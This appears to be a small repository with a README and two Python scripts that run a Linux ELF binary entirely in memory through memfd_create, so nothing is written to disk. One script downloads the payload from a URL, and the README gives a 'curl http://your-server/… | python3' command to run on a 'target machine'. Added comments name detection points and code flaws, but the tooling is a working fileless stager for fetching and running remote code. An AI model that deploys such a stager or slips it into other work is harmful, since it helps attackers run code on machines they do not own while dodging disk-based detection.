├── README.md
├── download_exec_elf_in_memory.py
└── exec_elf_in_memory.py

/README.md:
--------------------------------------------------------------------------------
# elf-in-memory-exec

### Introduction

Python3 scripts that executes an elf (linux executable format) completely in memory, nothing is written in disk. All you need is python3 on your host to run it. There are two scripts for two use cases:

- `download_exec_elf_in_memory.py` : Download and execute an elf in memory (payload url must be provided; staged)
- `exec_elf_in_memory.py` : Execute an elf in memory (payload is embedded in the script itself; unstaged)

### Usage

**First**, modify the script on your machine, set the necessary inputs under the `#MAIN CODE` section for whichever script you use. Follow the comments in the code.

**Second**, on target machine, as an example, run:

```
curl http://your-server/exec_elf_in_memory.py | python3
```

--------------------------------------------------------------------------------
/download_exec_elf_in_memory.py:
--------------------------------------------------------------------------------
#!/usr/bin/python3

# Staged variant: fetches the payload over HTTP(S) and runs it from an anonymous
# memfd, so the ELF is never written to a regular file.
# Defender note: the child is exec'd through /proc/self/fd/<n>; on Linux the
# resulting process's /proc/<pid>/exe resolves to a "/memfd:<name> (deleted)"
# path, and the memfd_create syscall itself is a natural audit point. Nothing in
# this script alters either observable.

import os
from random import choice
from string import ascii_lowercase
from urllib import request,error

def createFd() -> int:
    """Create an anonymous in-memory file with memfd_create and return its fd.

    The 7-letter random name is only a label (it is what appears after
    "/memfd:" in /proc); it does not affect the file's contents or permissions.
    """
    print("Creating anonymous fd")
    s = ""
    for _ in range(7):
        s += choice(ascii_lowercase)  # random.choice: the name is cosmetic, so non-CSPRNG is fine

    fd = os.memfd_create(s,0)
    # NOTE(review): dead branch. os.memfd_create raises OSError on failure and
    # never returns -1, so a failure surfaces as an uncaught traceback rather
    # than this message. exit() is the site-module builtin (absent under
    # `python3 -S`), and exit(0) would report success for an error path.
    if fd == -1:
        print("Error in creating fd")
        exit(0)
    return fd

def getFileFromUrl(url: str) -> bytes:
    """Download *url* with urllib and return the raw response body.

    Exits the process on any URLError or on a non-"OK" reason phrase. There is
    no timeout and no integrity check on the downloaded bytes; whatever the
    server returns is what gets executed.
    """
    print("Downloading contents from url")
    try:
        r = request.urlopen(url)
        c = r.read()
        r.close()
        # r.msg is the HTTP reason phrase. urlopen already raises HTTPError (a
        # URLError subclass, caught below) for 4xx/5xx, so this check only
        # triggers for a 2xx response whose reason phrase is not literally "OK";
        # note the body has already been read by this point.
        if r.msg != 'OK':
            print("Error connecting to url")
            exit()
        return c
    except error.URLError as e:
        # NOTE(review): e.reason may be an exception instance rather than a str
        # (e.g. a socket error), in which case this concatenation raises
        # TypeError and masks the original error.
        print("Download error; " + e.reason)
        exit()

def writeToFile(fd: int, c: bytes) -> None:
    """Write *c* into the memfd by opening its /proc/self/fd path for writing.

    This opens a second descriptor on the same anonymous file and closes it on
    exit from the with-block; the original *fd* stays open and is what
    execAnonFile later executes.
    """
    print("Writing contents to anonymous file")
    with open("/proc/self/fd/{}".format(fd),'wb') as f:
        f.write(c)

def execAnonFile(fd: int, args: list[str], wait_for_proc_terminate: bool) -> None:
    """Fork, and in the child execve() the memfd via /proc/self/fd/<fd>.

    Args:
        fd: descriptor returned by createFd; it must still be open across fork.
        args: argv for the program. Only the child's copy is modified (the
            /proc path is inserted as argv[0] after fork), so the caller's
            list is left untouched.
        wait_for_proc_terminate: if True the parent blocks in waitpid until the
            child exits; otherwise the parent returns immediately.
    """
    print("Spawning process...")
    child_pid = os.fork()
    # NOTE(review): dead branch. os.fork raises OSError on failure rather than
    # returning -1.
    if child_pid == -1:
        print("Error spawning new process")
        exit()
    elif child_pid == 0:
        print("[+] Executing...")
        fname = "/proc/self/fd/{}".format(fd)
        args.insert(0,fname)  # argv[0] is the /proc path, which is what the exec'd image will see
        os.execve(fname,args,dict(os.environ))  # the parent's full environment is passed through unchanged
    else:
        if wait_for_proc_terminate:
            print("Waiting for new process ({}) to terminate".format(child_pid))
            os.waitpid(child_pid,0)
        else:
            # "orphaned" is the script's wording; nothing here detaches the
            # child, so it remains this process's child until the parent exits.
            print("New process is now orphaned")

# MAIN CODE
url = "" # To download elf from; format: http://your-server/your_elf
args = [] # List of arguments to pass to program; format: ["arg1","arg2",...], leave it empty for no arguments.
wait_for_proc_terminate = True # Wait for new spawned process to terminate

# Only KeyboardInterrupt is handled here; an OSError from memfd_create, fork or
# execve propagates as an uncaught traceback.
try:
    fd = createFd()
    contents = getFileFromUrl(url)
    writeToFile(fd,contents)
    execAnonFile(fd,args,wait_for_proc_terminate)
except KeyboardInterrupt:
    print("User interrupted!")
--------------------------------------------------------------------------------
/exec_elf_in_memory.py:
--------------------------------------------------------------------------------
#!/usr/bin/python3

# Unstaged variant: the ELF bytes are embedded in elf_contents below and run
# from an anonymous memfd, so the ELF is never written to a regular file.
# Defender note: as in the staged script, the child is exec'd through
# /proc/self/fd/<n>, so its /proc/<pid>/exe resolves to a
# "/memfd:<name> (deleted)" path and the memfd_create syscall is observable.

import os
from random import choice
from string import ascii_lowercase
from urllib import request,error  # NOTE(review): unused in this script (no download step)

def createFd() -> int:
    """Create an anonymous in-memory file with memfd_create and return its fd.

    The 7-letter random name is only a label (it is what appears after
    "/memfd:" in /proc); it does not affect the file's contents or permissions.
    """
    print("Creating anonymous fd")
    s = ""
    for _ in range(7):
        s += choice(ascii_lowercase)  # random.choice: the name is cosmetic, so non-CSPRNG is fine

    fd = os.memfd_create(s,0)
    # NOTE(review): dead branch. os.memfd_create raises OSError on failure and
    # never returns -1, so a failure surfaces as an uncaught traceback rather
    # than this message. exit() is the site-module builtin (absent under
    # `python3 -S`), and exit(0) would report success for an error path.
    if fd == -1:
        print("Error in creating fd")
        exit(0)
    return fd

def writeToFile(fd: int, c: bytes) -> None:
    """Write *c* into the memfd by opening its /proc/self/fd path for writing.

    This opens a second descriptor on the same anonymous file and closes it on
    exit from the with-block; the original *fd* stays open and is what
    execAnonFile later executes.
    """
    print("Writing contents to anonymous file")
    with open("/proc/self/fd/{}".format(fd),'wb') as f:
        f.write(c)

def execAnonFile(fd: int, args: list[str], wait_for_proc_terminate: bool) -> None:
    """Fork, and in the child execve() the memfd via /proc/self/fd/<fd>.

    Args:
        fd: descriptor returned by createFd; it must still be open across fork.
        args: argv for the program. Only the child's copy is modified (the
            /proc path is inserted as argv[0] after fork), so the caller's
            list is left untouched.
        wait_for_proc_terminate: if True the parent blocks in waitpid until the
            child exits; otherwise the parent returns immediately.
    """
    print("Spawning process...")
    child_pid = os.fork()
    # NOTE(review): dead branch. os.fork raises OSError on failure rather than
    # returning -1.
    if child_pid == -1:
        print("Error spawning new process")
        exit()
    elif child_pid == 0:
        print("[+] Executing...")
        fname = "/proc/self/fd/{}".format(fd)
        args.insert(0,fname)  # argv[0] is the /proc path, which is what the exec'd image will see
        os.execve(fname,args,dict(os.environ))  # the parent's full environment is passed through unchanged
    else:
        if wait_for_proc_terminate:
            print("Waiting for new process ({}) to terminate".format(child_pid))
            os.waitpid(child_pid,0)
        else:
            # "orphaned" is the script's wording; nothing here detaches the
            # child, so it remains this process's child until the parent exits.
            print("New process is now orphaned")

# MAIN CODE
elf_contents = b"" # ELF contents, format: b"\x23\x57..."
args = [] # List of arguments to pass to program; format: ["arg1","arg2",...], leave it empty for no arguments.
wait_for_proc_terminate = True # Wait for new spawned process to terminate

# Only KeyboardInterrupt is handled here; an OSError from memfd_create, fork or
# execve propagates as an uncaught traceback. With elf_contents left empty,
# execve fails on a zero-length file.
try:
    fd = createFd()
    writeToFile(fd,elf_contents)
    execAnonFile(fd,args,wait_for_proc_terminate)
except KeyboardInterrupt:
    print("User interrupted!")
--------------------------------------------------------------------------------